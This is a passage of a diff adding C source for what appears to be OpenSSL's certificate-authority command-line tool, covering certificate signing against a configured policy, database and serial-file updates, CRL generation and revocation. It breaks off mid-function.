+        for (i = 0; i < argc; i++) {
+            total++;
+            j = certify(&x, argv[i], pkey, x509p, dgst, sigopts, attribs, db,
+                        serial, subj, chtype, multirdn, email_dn, startdate,
+                        enddate, days, batch, extensions, conf, verbose,
+                        certopt, nameopt, default_op, ext_copy, selfsign);
+            if (j < 0)
+                goto err;
+            if (j > 0) {
+                total_done++;
+                BIO_printf(bio_err, "\n");
+                if (!BN_add_word(serial, 1))
+                    goto err;
+                if (!sk_X509_push(cert_sk, x)) {
+                    BIO_printf(bio_err, "Memory allocation failure\n");
+                    goto err;
+                }
+            }
+        }
+        /*
+         * we have a stack of newly certified certificates and a data base
+         * and serial number that need updating
+         */
+
+        if (sk_X509_num(cert_sk) > 0) {
+            if (!batch) {
+                BIO_printf(bio_err,
+                           "\n%d out of %d certificate requests certified, commit? [y/n]",
+                           total_done, total);
+                (void)BIO_flush(bio_err);
+                buf[0][0] = '\0';
+                if (!fgets(buf[0], 10, stdin)) {
+                    BIO_printf(bio_err,
+                               "CERTIFICATION CANCELED: I/O error\n");
+                    ret = 0;
+                    goto err;
+                }
+                if ((buf[0][0] != 'y') && (buf[0][0] != 'Y')) {
+                    BIO_printf(bio_err, "CERTIFICATION CANCELED\n");
+                    ret = 0;
+                    goto err;
+                }
+            }
+
+            BIO_printf(bio_err, "Write out database with %d new entries\n",
+                       sk_X509_num(cert_sk));
+
+            if (!save_serial(serialfile, "new", serial, NULL))
+                goto err;
+
+            if (!save_index(dbfile, "new", db))
+                goto err;
+        }
+
+        if (verbose)
+            BIO_printf(bio_err, "writing new certificates\n");
+        for (i = 0; i < sk_X509_num(cert_sk); i++) {
+            int k;
+            char *n;
+
+            x = sk_X509_value(cert_sk, i);
+
+            j = x->cert_info->serialNumber->length;
+            p = (const char *)x->cert_info->serialNumber->data;
+
+            if (strlen(outdir) >= (size_t)(j ? BSIZE - j * 2 - 6 : BSIZE - 8)) {
+                BIO_printf(bio_err, "certificate file name too long\n");
+                goto err;
+            }
+
+            strcpy(buf[2], outdir);
+
+#ifndef OPENSSL_SYS_VMS
+            BUF_strlcat(buf[2], "/", sizeof(buf[2]));
+#endif
+
+            n = (char *)&(buf[2][strlen(buf[2])]);
+            if (j > 0) {
+                for (k = 0; k < j; k++) {
+                    if (n >= &(buf[2][sizeof(buf[2])]))
+                        break;
+                    BIO_snprintf(n,
+                                 &buf[2][0] + sizeof(buf[2]) - n,
+                                 "%02X", (unsigned char)*(p++));
+                    n += 2;
+                }
+            } else {
+                *(n++) = '0';
+                *(n++) = '0';
+            }
+            *(n++) = '.';
+            *(n++) = 'p';
+            *(n++) = 'e';
+            *(n++) = 'm';
+            *n = '\0';
+            if (verbose)
+                BIO_printf(bio_err, "writing %s\n", buf[2]);
+
+            if (BIO_write_filename(Cout, buf[2]) <= 0) {
+                perror(buf[2]);
+                goto err;
+            }
+            write_new_certificate(Cout, x, 0, notext);
+            write_new_certificate(Sout, x, output_der, notext);
+        }
+
+        if (sk_X509_num(cert_sk)) {
+            /* Rename the database and the serial file */
+            if (!rotate_serial(serialfile, "new", "old"))
+                goto err;
+
+            if (!rotate_index(dbfile, "new", "old"))
+                goto err;
+
+            BIO_printf(bio_err, "Data Base Updated\n");
+        }
+    }
+
+        /*****************************************************************/
+    if (gencrl) {
+        int crl_v2 = 0;
+        if (!crl_ext) {
+            crl_ext = NCONF_get_string(conf, section, ENV_CRLEXT);
+            if (!crl_ext)
+                ERR_clear_error();
+        }
+        if (crl_ext) {
+            /* Check syntax of file */
+            X509V3_CTX ctx;
+            X509V3_set_ctx_test(&ctx);
+            X509V3_set_nconf(&ctx, conf);
+            if (!X509V3_EXT_add_nconf(conf, &ctx, crl_ext, NULL)) {
+                BIO_printf(bio_err,
+                           "Error Loading CRL extension section %s\n",
+                           crl_ext);
+                ret = 1;
+                goto err;
+            }
+        }
+
+        if ((crlnumberfile = NCONF_get_string(conf, section, ENV_CRLNUMBER))
+            != NULL)
+            if ((crlnumber = load_serial(crlnumberfile, 0, NULL)) == NULL) {
+                BIO_printf(bio_err, "error while loading CRL number\n");
+                goto err;
+            }
+
+        if (!crldays && !crlhours && !crlsec) {
+            if (!NCONF_get_number(conf, section,
+                                  ENV_DEFAULT_CRL_DAYS, &crldays))
+                crldays = 0;
+            if (!NCONF_get_number(conf, section,
+                                  ENV_DEFAULT_CRL_HOURS, &crlhours))
+                crlhours = 0;
+            ERR_clear_error();
+        }
+        if ((crldays == 0) && (crlhours == 0) && (crlsec == 0)) {
+            BIO_printf(bio_err,
+                       "cannot lookup how long until the next CRL is issued\n");
+            goto err;
+        }
+
+        if (verbose)
+            BIO_printf(bio_err, "making CRL\n");
+        if ((crl = X509_CRL_new()) == NULL)
+            goto err;
+        if (!X509_CRL_set_issuer_name(crl, X509_get_subject_name(x509)))
+            goto err;
+
+        tmptm = ASN1_TIME_new();
+        if (!tmptm)
+            goto err;
+        X509_gmtime_adj(tmptm, 0);
+        X509_CRL_set_lastUpdate(crl, tmptm);
+        if (!X509_time_adj_ex(tmptm, crldays, crlhours * 60 * 60 + crlsec,
+                              NULL)) {
+            BIO_puts(bio_err, "error setting CRL nextUpdate\n");
+            goto err;
+        }
+        X509_CRL_set_nextUpdate(crl, tmptm);
+
+        ASN1_TIME_free(tmptm);
+
+        for (i = 0; i < sk_OPENSSL_PSTRING_num(db->db->data); i++) {
+            pp = sk_OPENSSL_PSTRING_value(db->db->data, i);
+            if (pp[DB_type][0] == DB_TYPE_REV) {
+                if ((r = X509_REVOKED_new()) == NULL)
+                    goto err;
+                j = make_revoked(r, pp[DB_rev_date]);
+                if (!j)
+                    goto err;
+                if (j == 2)
+                    crl_v2 = 1;
+                if (!BN_hex2bn(&serial, pp[DB_serial]))
+                    goto err;
+                tmpser = BN_to_ASN1_INTEGER(serial, NULL);
+                BN_free(serial);
+                serial = NULL;
+                if (!tmpser)
+                    goto err;
+                X509_REVOKED_set_serialNumber(r, tmpser);
+                ASN1_INTEGER_free(tmpser);
+                X509_CRL_add0_revoked(crl, r);
+            }
+        }
+
+        /*
+         * sort the data so it will be written in serial number order
+         */
+        X509_CRL_sort(crl);
+
+        /* we now have a CRL */
+        if (verbose)
+            BIO_printf(bio_err, "signing CRL\n");
+
+        /* Add any extensions asked for */
+
+        if (crl_ext || crlnumberfile != NULL) {
+            X509V3_CTX crlctx;
+            X509V3_set_ctx(&crlctx, x509, NULL, NULL, crl, 0);
+            X509V3_set_nconf(&crlctx, conf);
+
+            if (crl_ext)
+                if (!X509V3_EXT_CRL_add_nconf(conf, &crlctx, crl_ext, crl))
+                    goto err;
+            if (crlnumberfile != NULL) {
+                tmpser = BN_to_ASN1_INTEGER(crlnumber, NULL);
+                if (!tmpser)
+                    goto err;
+                X509_CRL_add1_ext_i2d(crl, NID_crl_number, tmpser, 0, 0);
+                ASN1_INTEGER_free(tmpser);
+                crl_v2 = 1;
+                if (!BN_add_word(crlnumber, 1))
+                    goto err;
+            }
+        }
+        if (crl_ext || crl_v2) {
+            if (!X509_CRL_set_version(crl, 1))
+                goto err;       /* version 2 CRL */
+        }
+
+        /* we have a CRL number that need updating */
+        if (crlnumberfile != NULL)
+            if (!save_serial(crlnumberfile, "new", crlnumber, NULL))
+                goto err;
+
+        if (crlnumber) {
+            BN_free(crlnumber);
+            crlnumber = NULL;
+        }
+
+        if (!do_X509_CRL_sign(bio_err, crl, pkey, dgst, sigopts))
+            goto err;
+
+        PEM_write_bio_X509_CRL(Sout, crl);
+
+        if (crlnumberfile != NULL) /* Rename the crlnumber file */
+            if (!rotate_serial(crlnumberfile, "new", "old"))
+                goto err;
+
+    }
+        /*****************************************************************/
+    if (dorevoke) {
+        if (infile == NULL) {
+            BIO_printf(bio_err, "no input files\n");
+            goto err;
+        } else {
+            X509 *revcert;
+            revcert = load_cert(bio_err, infile, FORMAT_PEM, NULL, e, infile);
+            if (revcert == NULL)
+                goto err;
+            if (dorevoke == 2)
+                rev_type = -1;
+            j = do_revoke(revcert, db, rev_type, rev_arg);
+            if (j <= 0)
+                goto err;
+            X509_free(revcert);
+
+            if (!save_index(dbfile, "new", db))
+                goto err;
+
+            if (!rotate_index(dbfile, "new", "old"))
+                goto err;
+
+            BIO_printf(bio_err, "Data Base Updated\n");
+        }
+    }
+        /*****************************************************************/
+    ret = 0;
+ err:
+    if (tofree)
+        OPENSSL_free(tofree);
+    BIO_free_all(Cout);
+    BIO_free_all(Sout);
+    BIO_free_all(out);
+    BIO_free_all(in);
+
+    if (cert_sk)
+        sk_X509_pop_free(cert_sk, X509_free);
+
+    if (ret)
+        ERR_print_errors(bio_err);
+    app_RAND_write_file(randfile, bio_err);
+    if (free_key && key)
+        OPENSSL_free(key);
+    BN_free(serial);
+    BN_free(crlnumber);
+    free_index(db);
+    if (sigopts)
+        sk_OPENSSL_STRING_free(sigopts);
+    EVP_PKEY_free(pkey);
+    if (x509)
+        X509_free(x509);
+    X509_CRL_free(crl);
+    NCONF_free(conf);
+    NCONF_free(extconf);
+    OBJ_cleanup();
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+static void lookup_fail(const char *name, const char *tag)
+{
+    BIO_printf(bio_err, "variable lookup failed for %s::%s\n", name, tag);
+}
+
+static int certify(X509 **xret, char *infile, EVP_PKEY *pkey, X509 *x509,
+                   const EVP_MD *dgst, STACK_OF(OPENSSL_STRING) *sigopts,
+                   STACK_OF(CONF_VALUE) *policy, CA_DB *db,
+                   BIGNUM *serial, char *subj, unsigned long chtype,
+                   int multirdn, int email_dn, char *startdate, char *enddate,
+                   long days, int batch, char *ext_sect, CONF *lconf,
+                   int verbose, unsigned long certopt, unsigned long nameopt,
+                   int default_op, int ext_copy, int selfsign)
+{
+    X509_REQ *req = NULL;
+    BIO *in = NULL;
+    EVP_PKEY *pktmp = NULL;
+    int ok = -1, i;
+
+    in = BIO_new(BIO_s_file());
+
+    if (BIO_read_filename(in, infile) <= 0) {
+        perror(infile);
+        goto err;
+    }
+    if ((req = PEM_read_bio_X509_REQ(in, NULL, NULL, NULL)) == NULL) {
+        BIO_printf(bio_err, "Error reading certificate request in %s\n",
+                   infile);
+        goto err;
+    }
+    if (verbose)
+        X509_REQ_print(bio_err, req);
+
+    BIO_printf(bio_err, "Check that the request matches the signature\n");
+
+    if (selfsign && !X509_REQ_check_private_key(req, pkey)) {
+        BIO_printf(bio_err,
+                   "Certificate request and CA private key do not match\n");
+        ok = 0;
+        goto err;
+    }
+    if ((pktmp = X509_REQ_get_pubkey(req)) == NULL) {
+        BIO_printf(bio_err, "error unpacking public key\n");
+        goto err;
+    }
+    i = X509_REQ_verify(req, pktmp);
+    EVP_PKEY_free(pktmp);
+    if (i < 0) {
+        ok = 0;
+        BIO_printf(bio_err, "Signature verification problems....\n");
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+    if (i == 0) {
+        ok = 0;
+        BIO_printf(bio_err,
+                   "Signature did not match the certificate request\n");
+        ERR_print_errors(bio_err);
+        goto err;
+    } else
+        BIO_printf(bio_err, "Signature ok\n");
+
+    ok = do_body(xret, pkey, x509, dgst, sigopts, policy, db, serial, subj,
+                 chtype, multirdn, email_dn, startdate, enddate, days, batch,
+                 verbose, req, ext_sect, lconf, certopt, nameopt, default_op,
+                 ext_copy, selfsign);
+
+ err:
+    if (req != NULL)
+        X509_REQ_free(req);
+    if (in != NULL)
+        BIO_free(in);
+    return (ok);
+}
+
+static int certify_cert(X509 **xret, char *infile, EVP_PKEY *pkey, X509 *x509,
+                        const EVP_MD *dgst, STACK_OF(OPENSSL_STRING) *sigopts,
+                        STACK_OF(CONF_VALUE) *policy, CA_DB *db,
+                        BIGNUM *serial, char *subj, unsigned long chtype,
+                        int multirdn, int email_dn, char *startdate,
+                        char *enddate, long days, int batch, char *ext_sect,
+                        CONF *lconf, int verbose, unsigned long certopt,
+                        unsigned long nameopt, int default_op, int ext_copy,
+                        ENGINE *e)
+{
+    X509 *req = NULL;
+    X509_REQ *rreq = NULL;
+    EVP_PKEY *pktmp = NULL;
+    int ok = -1, i;
+
+    if ((req =
+         load_cert(bio_err, infile, FORMAT_PEM, NULL, e, infile)) == NULL)
+        goto err;
+    if (verbose)
+        X509_print(bio_err, req);
+
+    BIO_printf(bio_err, "Check that the request matches the signature\n");
+
+    if ((pktmp = X509_get_pubkey(req)) == NULL) {
+        BIO_printf(bio_err, "error unpacking public key\n");
+        goto err;
+    }
+    i = X509_verify(req, pktmp);
+    EVP_PKEY_free(pktmp);
+    if (i < 0) {
+        ok = 0;
+        BIO_printf(bio_err, "Signature verification problems....\n");
+        goto err;
+    }
+    if (i == 0) {
+        ok = 0;
+        BIO_printf(bio_err, "Signature did not match the certificate\n");
+        goto err;
+    } else
+        BIO_printf(bio_err, "Signature ok\n");
+
+    if ((rreq = X509_to_X509_REQ(req, NULL, EVP_md5())) == NULL)
+        goto err;
+
+    ok = do_body(xret, pkey, x509, dgst, sigopts, policy, db, serial, subj,
+                 chtype, multirdn, email_dn, startdate, enddate, days, batch,
+                 verbose, rreq, ext_sect, lconf, certopt, nameopt, default_op,
+                 ext_copy, 0);
+
+ err:
+    if (rreq != NULL)
+        X509_REQ_free(rreq);
+    if (req != NULL)
+        X509_free(req);
+    return (ok);
+}
+
+static int do_body(X509 **xret, EVP_PKEY *pkey, X509 *x509,
+                   const EVP_MD *dgst, STACK_OF(OPENSSL_STRING) *sigopts,
+                   STACK_OF(CONF_VALUE) *policy, CA_DB *db, BIGNUM *serial,
+                   char *subj, unsigned long chtype, int multirdn,
+                   int email_dn, char *startdate, char *enddate, long days,
+                   int batch, int verbose, X509_REQ *req, char *ext_sect,
+                   CONF *lconf, unsigned long certopt, unsigned long nameopt,
+                   int default_op, int ext_copy, int selfsign)
+{
+    X509_NAME *name = NULL, *CAname = NULL, *subject = NULL, *dn_subject =
+        NULL;
+    ASN1_UTCTIME *tm, *tmptm;
+    ASN1_STRING *str, *str2;
+    ASN1_OBJECT *obj;
+    X509 *ret = NULL;
+    X509_CINF *ci;
+    X509_NAME_ENTRY *ne;
+    X509_NAME_ENTRY *tne, *push;
+    EVP_PKEY *pktmp;
+    int ok = -1, i, j, last, nid;
+    const char *p;
+    CONF_VALUE *cv;
+    OPENSSL_STRING row[DB_NUMBER];
+    OPENSSL_STRING *irow = NULL;
+    OPENSSL_STRING *rrow = NULL;
+    char buf[25];
+
+    tmptm = ASN1_UTCTIME_new();
+    if (tmptm == NULL) {
+        BIO_printf(bio_err, "malloc error\n");
+        return (0);
+    }
+
+    for (i = 0; i < DB_NUMBER; i++)
+        row[i] = NULL;
+
+    if (subj) {
+        X509_NAME *n = parse_name(subj, chtype, multirdn);
+
+        if (!n) {
+            ERR_print_errors(bio_err);
+            goto err;
+        }
+        X509_REQ_set_subject_name(req, n);
+        req->req_info->enc.modified = 1;
+        X509_NAME_free(n);
+    }
+
+    if (default_op)
+        BIO_printf(bio_err,
+                   "The Subject's Distinguished Name is as follows\n");
+
+    name = X509_REQ_get_subject_name(req);
+    for (i = 0; i < X509_NAME_entry_count(name); i++) {
+        ne = X509_NAME_get_entry(name, i);
+        str = X509_NAME_ENTRY_get_data(ne);
+        obj = X509_NAME_ENTRY_get_object(ne);
+
+        if (msie_hack) {
+            /* assume all type should be strings */
+            nid = OBJ_obj2nid(ne->object);
+
+            if (str->type == V_ASN1_UNIVERSALSTRING)
+                ASN1_UNIVERSALSTRING_to_string(str);
+
+            if ((str->type == V_ASN1_IA5STRING) &&
+                (nid != NID_pkcs9_emailAddress))
+                str->type = V_ASN1_T61STRING;
+
+            if ((nid == NID_pkcs9_emailAddress) &&
+                (str->type == V_ASN1_PRINTABLESTRING))
+                str->type = V_ASN1_IA5STRING;
+        }
+
+        /* If no EMAIL is wanted in the subject */
+        if ((OBJ_obj2nid(obj) == NID_pkcs9_emailAddress) && (!email_dn))
+            continue;
+
+        /* check some things */
+        if ((OBJ_obj2nid(obj) == NID_pkcs9_emailAddress) &&
+            (str->type != V_ASN1_IA5STRING)) {
+            BIO_printf(bio_err,
+                       "\nemailAddress type needs to be of type IA5STRING\n");
+            goto err;
+        }
+        if ((str->type != V_ASN1_BMPSTRING)
+            && (str->type != V_ASN1_UTF8STRING)) {
+            j = ASN1_PRINTABLE_type(str->data, str->length);
+            if (((j == V_ASN1_T61STRING) &&
+                 (str->type != V_ASN1_T61STRING)) ||
+                ((j == V_ASN1_IA5STRING) &&
+                 (str->type == V_ASN1_PRINTABLESTRING))) {
+                BIO_printf(bio_err,
+                           "\nThe string contains characters that are illegal for the ASN.1 type\n");
+                goto err;
+            }
+        }
+
+        if (default_op)
+            old_entry_print(bio_err, obj, str);
+    }
+
+    /* Ok, now we check the 'policy' stuff. */
+    if ((subject = X509_NAME_new()) == NULL) {
+        BIO_printf(bio_err, "Memory allocation failure\n");
+        goto err;
+    }
+
+    /* take a copy of the issuer name before we mess with it. */
+    if (selfsign)
+        CAname = X509_NAME_dup(name);
+    else
+        CAname = X509_NAME_dup(x509->cert_info->subject);
+    if (CAname == NULL)
+        goto err;
+    str = str2 = NULL;
+
+    for (i = 0; i < sk_CONF_VALUE_num(policy); i++) {
+        cv = sk_CONF_VALUE_value(policy, i); /* get the object id */
+        if ((j = OBJ_txt2nid(cv->name)) == NID_undef) {
+            BIO_printf(bio_err,
+                       "%s:unknown object type in 'policy' configuration\n",
+                       cv->name);
+            goto err;
+        }
+        obj = OBJ_nid2obj(j);
+
+        last = -1;
+        for (;;) {
+            /* lookup the object in the supplied name list */
+            j = X509_NAME_get_index_by_OBJ(name, obj, last);
+            if (j < 0) {
+                if (last != -1)
+                    break;
+                tne = NULL;
+            } else {
+                tne = X509_NAME_get_entry(name, j);
+            }
+            last = j;
+
+            /* depending on the 'policy', decide what to do. */
+            push = NULL;
+            if (strcmp(cv->value, "optional") == 0) {
+                if (tne != NULL)
+                    push = tne;
+            } else if (strcmp(cv->value, "supplied") == 0) {
+                if (tne == NULL) {
+                    BIO_printf(bio_err,
+                               "The %s field needed to be supplied and was missing\n",
+                               cv->name);
+                    goto err;
+                } else
+                    push = tne;
+            } else if (strcmp(cv->value, "match") == 0) {
+                int last2;
+
+                if (tne == NULL) {
+                    BIO_printf(bio_err,
+                               "The mandatory %s field was missing\n",
+                               cv->name);
+                    goto err;
+                }
+
+                last2 = -1;
+
+ again2:
+                j = X509_NAME_get_index_by_OBJ(CAname, obj, last2);
+                if ((j < 0) && (last2 == -1)) {
+                    BIO_printf(bio_err,
+                               "The %s field does not exist in the CA certificate,\nthe 'policy' is misconfigured\n",
+                               cv->name);
+                    goto err;
+                }
+                if (j >= 0) {
+                    push = X509_NAME_get_entry(CAname, j);
+                    str = X509_NAME_ENTRY_get_data(tne);
+                    str2 = X509_NAME_ENTRY_get_data(push);
+                    last2 = j;
+                    if (ASN1_STRING_cmp(str, str2) != 0)
+                        goto again2;
+                }
+                if (j < 0) {
+                    BIO_printf(bio_err,
+                               "The %s field needed to be the same in the\nCA certificate (%s) and the request (%s)\n",
+                               cv->name,
+                               ((str2 == NULL) ? "NULL" : (char *)str2->data),
+                               ((str == NULL) ? "NULL" : (char *)str->data));
+                    goto err;
+                }
+            } else {
+                BIO_printf(bio_err,
+                           "%s:invalid type in 'policy' configuration\n",
+                           cv->value);
+                goto err;
+            }
+
+            if (push != NULL) {
+                if (!X509_NAME_add_entry(subject, push, -1, 0)) {
+                    if (push != NULL)
+                        X509_NAME_ENTRY_free(push);
+                    BIO_printf(bio_err, "Memory allocation failure\n");
+                    goto err;
+                }
+            }
+            if (j < 0)
+                break;
+        }
+    }
+
+    if (preserve) {
+        X509_NAME_free(subject);
+        /* subject=X509_NAME_dup(X509_REQ_get_subject_name(req)); */
+        subject = X509_NAME_dup(name);
+        if (subject == NULL)
+            goto err;
+    }
+
+    if (verbose)
+        BIO_printf(bio_err,
+                   "The subject name appears to be ok, checking data base for clashes\n");
+
+    /* Build the correct Subject if no e-mail is wanted in the subject */
+    /*
+     * and add it later on because of the method extensions are added
+     * (altName)
+     */
+
+    if (email_dn)
+        dn_subject = subject;
+    else {
+        X509_NAME_ENTRY *tmpne;
+        /*
+         * Its best to dup the subject DN and then delete any email addresses
+         * because this retains its structure.
+         */
+        if (!(dn_subject = X509_NAME_dup(subject))) {
+            BIO_printf(bio_err, "Memory allocation failure\n");
+            goto err;
+        }
+        while ((i = X509_NAME_get_index_by_NID(dn_subject,
+                                               NID_pkcs9_emailAddress,
+                                               -1)) >= 0) {
+            tmpne = X509_NAME_get_entry(dn_subject, i);
+            X509_NAME_delete_entry(dn_subject, i);
+            X509_NAME_ENTRY_free(tmpne);
+        }
+    }
+
+    if (BN_is_zero(serial))
+        row[DB_serial] = BUF_strdup("00");
+    else
+        row[DB_serial] = BN_bn2hex(serial);
+    if (row[DB_serial] == NULL) {
+        BIO_printf(bio_err, "Memory allocation failure\n");
+        goto err;
+    }
+
+    if (db->attributes.unique_subject) {
+        OPENSSL_STRING *crow = row;
+
+        rrow = TXT_DB_get_by_index(db->db, DB_name, crow);
+        if (rrow != NULL) {
+            BIO_printf(bio_err,
+                       "ERROR:There is already a certificate for %s\n",
+                       row[DB_name]);
+        }
+    }
+    if (rrow == NULL) {
+        rrow = TXT_DB_get_by_index(db->db, DB_serial, row);
+        if (rrow != NULL) {
+            BIO_printf(bio_err,
+                       "ERROR:Serial number %s has already been issued,\n",
+                       row[DB_serial]);
+            BIO_printf(bio_err,
+                       "      check the database/serial_file for corruption\n");
+        }
+    }
+
+    if (rrow != NULL) {
+        BIO_printf(bio_err, "The matching entry has the following details\n");
+        if (rrow[DB_type][0] == 'E')
+            p = "Expired";
+        else if (rrow[DB_type][0] == 'R')
+            p = "Revoked";
+        else if (rrow[DB_type][0] == 'V')
+            p = "Valid";
+        else
+            p = "\ninvalid type, Data base error\n";
+        BIO_printf(bio_err, "Type          :%s\n", p);;
+        if (rrow[DB_type][0] == 'R') {
+            p = rrow[DB_exp_date];
+            if (p == NULL)
+                p = "undef";
+            BIO_printf(bio_err, "Was revoked on:%s\n", p);
+        }
+        p = rrow[DB_exp_date];
+        if (p == NULL)
+            p = "undef";
+        BIO_printf(bio_err, "Expires on    :%s\n", p);
+        p = rrow[DB_serial];
+        if (p == NULL)
+            p = "undef";
+        BIO_printf(bio_err, "Serial Number :%s\n", p);
+        p = rrow[DB_file];
+        if (p == NULL)
+            p = "undef";
+        BIO_printf(bio_err, "File name     :%s\n", p);
+        p = rrow[DB_name];
+        if (p == NULL)
+            p = "undef";
+        BIO_printf(bio_err, "Subject Name  :%s\n", p);
+        ok = -1;                /* This is now a 'bad' error. */
+        goto err;
+    }
+
+    /* We are now totally happy, lets make and sign the certificate */
+    if (verbose)
+        BIO_printf(bio_err,
+                   "Everything appears to be ok, creating and signing the certificate\n");
+
+    if ((ret = X509_new()) == NULL)
+        goto err;
+    ci = ret->cert_info;
+
+#ifdef X509_V3
+    /* Make it an X509 v3 certificate. */
+    if (!X509_set_version(ret, 2))
+        goto err;
+#endif
+
+    if (BN_to_ASN1_INTEGER(serial, ci->serialNumber) == NULL)
+        goto err;
+    if (selfsign) {
+        if (!X509_set_issuer_name(ret, subject))
+            goto err;
+    } else {
+        if (!X509_set_issuer_name(ret, X509_get_subject_name(x509)))
+            goto err;
+    }
+
+    if (strcmp(startdate, "today") == 0)
+        X509_gmtime_adj(X509_get_notBefore(ret), 0);
+    else
+        ASN1_TIME_set_string(X509_get_notBefore(ret), startdate);
+
+    if (enddate == NULL)
+        X509_time_adj_ex(X509_get_notAfter(ret), days, 0, NULL);
+    else {
+        int tdays;
+        ASN1_TIME_set_string(X509_get_notAfter(ret), enddate);
+        ASN1_TIME_diff(&tdays, NULL, NULL, X509_get_notAfter(ret));
+        days = tdays;
+    }
+
+    if (!X509_set_subject_name(ret, subject))
+        goto err;
+
+    pktmp = X509_REQ_get_pubkey(req);
+    i = X509_set_pubkey(ret, pktmp);
+    EVP_PKEY_free(pktmp);
+    if (!i)
+        goto err;
+
+    /* Lets add the extensions, if there are any */
+    if (ext_sect) {
+        X509V3_CTX ctx;
+        if (ci->version == NULL)
+            if ((ci->version = ASN1_INTEGER_new()) == NULL)
+                goto err;
+        ASN1_INTEGER_set(ci->version, 2); /* version 3 certificate */
+
+        /*
+         * Free the current entries if any, there should not be any I believe
+         */
+        if (ci->extensions != NULL)
+            sk_X509_EXTENSION_pop_free(ci->extensions, X509_EXTENSION_free);
+
+        ci->extensions = NULL;
+
+        /* Initialize the context structure */
+        if (selfsign)
+            X509V3_set_ctx(&ctx, ret, ret, req, NULL, 0);
+        else
+            X509V3_set_ctx(&ctx, x509, ret, req, NULL, 0);
+
+        if (extconf) {
+            if (verbose)
+                BIO_printf(bio_err, "Extra configuration file found\n");
+
+            /* Use the extconf configuration db LHASH */
+            X509V3_set_nconf(&ctx, extconf);
+
+            /* Test the structure (needed?) */
+            /* X509V3_set_ctx_test(&ctx); */
+
+            /* Adds exts contained in the configuration file */
+            if (!X509V3_EXT_add_nconf(extconf, &ctx, ext_sect, ret)) {
+                BIO_printf(bio_err,
+                           "ERROR: adding extensions in section %s\n",
+                           ext_sect);
+                ERR_print_errors(bio_err);
+                goto err;
+            }
+            if (verbose)
+                BIO_printf(bio_err,
+                           "Successfully added extensions from file.\n");
+        } else if (ext_sect) {
+            /* We found extensions to be set from config file */
+            X509V3_set_nconf(&ctx, lconf);
+
+            if (!X509V3_EXT_add_nconf(lconf, &ctx, ext_sect, ret)) {
+                BIO_printf(bio_err,
+                           "ERROR: adding extensions in section %s\n",
+                           ext_sect);
+                ERR_print_errors(bio_err);
+                goto err;
+            }
+
+            if (verbose)
+                BIO_printf(bio_err,
+                           "Successfully added extensions from config\n");
+        }
+    }
+
+    /* Copy extensions from request (if any) */
+
+    if (!copy_extensions(ret, req, ext_copy)) {
+        BIO_printf(bio_err, "ERROR: adding extensions from request\n");
+        ERR_print_errors(bio_err);
+        goto err;
+    }
+
+    /* Set the right value for the noemailDN option */
+    if (email_dn == 0) {
+        if (!X509_set_subject_name(ret, dn_subject))
+            goto err;
+    }
+
+    if (!default_op) {
+        BIO_printf(bio_err, "Certificate Details:\n");
+        /*
+         * Never print signature details because signature not present
+         */
+        certopt |= X509_FLAG_NO_SIGDUMP | X509_FLAG_NO_SIGNAME;
+        X509_print_ex(bio_err, ret, nameopt, certopt);
+    }
+
+    BIO_printf(bio_err, "Certificate is to be certified until ");
+    ASN1_TIME_print(bio_err, X509_get_notAfter(ret));
+    if (days)
+        BIO_printf(bio_err, " (%ld days)", days);
+    BIO_printf(bio_err, "\n");
+
+    if (!batch) {
+
+        BIO_printf(bio_err, "Sign the certificate? [y/n]:");
+        (void)BIO_flush(bio_err);
+        buf[0] = '\0';
+        if (!fgets(buf, sizeof(buf) - 1, stdin)) {
+            BIO_printf(bio_err,
+                       "CERTIFICATE WILL NOT BE CERTIFIED: I/O error\n");
+            ok = 0;
+            goto err;
+        }
+        if (!((buf[0] == 'y') || (buf[0] == 'Y'))) {
+            BIO_printf(bio_err, "CERTIFICATE WILL NOT BE CERTIFIED\n");
+            ok = 0;
+            goto err;
+        }
+    }
+
+    pktmp = X509_get_pubkey(ret);
+    if (EVP_PKEY_missing_parameters(pktmp) &&
+        !EVP_PKEY_missing_parameters(pkey))
+        EVP_PKEY_copy_parameters(pktmp, pkey);
+    EVP_PKEY_free(pktmp);
+
+    if (!do_X509_sign(bio_err, ret, pkey, dgst, sigopts))
+        goto err;
+
+    /* We now just add it to the database */
+    row[DB_type] = (char *)OPENSSL_malloc(2);
+
+    tm = X509_get_notAfter(ret);
+    row[DB_exp_date] = (char *)OPENSSL_malloc(tm->length + 1);
+    memcpy(row[DB_exp_date], tm->data, tm->length);
+    row[DB_exp_date][tm->length] = '\0';
+
+    row[DB_rev_date] = NULL;
+
+    /* row[DB_serial] done already */
+    row[DB_file] = (char *)OPENSSL_malloc(8);
+    row[DB_name] = X509_NAME_oneline(X509_get_subject_name(ret), NULL, 0);
+
+    if ((row[DB_type] == NULL) || (row[DB_exp_date] == NULL) ||
+        (row[DB_file] == NULL) || (row[DB_name] == NULL)) {
+        BIO_printf(bio_err, "Memory allocation failure\n");
+        goto err;
+    }
+    BUF_strlcpy(row[DB_file], "unknown", 8);
+    row[DB_type][0] = 'V';
+    row[DB_type][1] = '\0';
+
+    if ((irow =
+         (char **)OPENSSL_malloc(sizeof(char *) * (DB_NUMBER + 1))) == NULL) {
+        BIO_printf(bio_err, "Memory allocation failure\n");
+        goto err;
+    }
+
+    for (i = 0; i < DB_NUMBER; i++) {
+        irow[i] = row[i];
+        row[i] = NULL;
+    }
+    irow[DB_NUMBER] = NULL;
+
+    if (!TXT_DB_insert(db->db, irow)) {
+        BIO_printf(bio_err, "failed to update database\n");
+        BIO_printf(bio_err, "TXT_DB error number %ld\n", db->db->error);
+        goto err;
+    }
+    ok = 1;
+ err:
+    for (i = 0; i < DB_NUMBER; i++)
+        if (row[i] != NULL)
+            OPENSSL_free(row[i]);
+
+    if (CAname != NULL)
+        X509_NAME_free(CAname);
+    if (subject != NULL)
+        X509_NAME_free(subject);
+    if ((dn_subject != NULL) && !email_dn)
+        X509_NAME_free(dn_subject);
+    if (tmptm != NULL)
+        ASN1_UTCTIME_free(tmptm);
+    if (ok <= 0) {
+        if (ret != NULL)
+            X509_free(ret);
+        ret = NULL;
+    } else
+        *xret = ret;
+    return (ok);
+}
+
+static void write_new_certificate(BIO *bp, X509 *x, int output_der,
+                                  int notext)
+{
+
+    if (output_der) {
+        (void)i2d_X509_bio(bp, x);
+        return;
+    }
+#if 0
+    /* ??? Not needed since X509_print prints all this stuff anyway */
+    f = X509_NAME_oneline(X509_get_issuer_name(x), buf, 256);
+    BIO_printf(bp, "issuer :%s\n", f);
+
+    f = X509_NAME_oneline(X509_get_subject_name(x), buf, 256);
